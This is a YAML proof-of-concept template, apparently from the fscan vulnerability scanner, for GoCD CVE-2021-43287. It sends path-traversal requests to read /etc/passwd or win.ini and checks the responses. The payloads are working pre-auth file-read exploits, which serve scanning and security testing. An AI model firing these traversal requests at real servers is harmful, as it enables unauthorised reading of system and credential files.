fscan/Web_Scan/pocs/gocd-cve-2021-43287.yml

18 lines
811 B
YAML

name: poc-yaml-gocd-cve-2021-43287
groups:
linux0:
- method: GET
path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../etc/passwd
follow_redirects: false
expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
windows0:
- method: GET
path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../windows/win.ini
follow_redirects: false
expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
detail:
author: For3stCo1d (https://github.com/For3stCo1d)
description: "Gocd-file-read"
links:
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover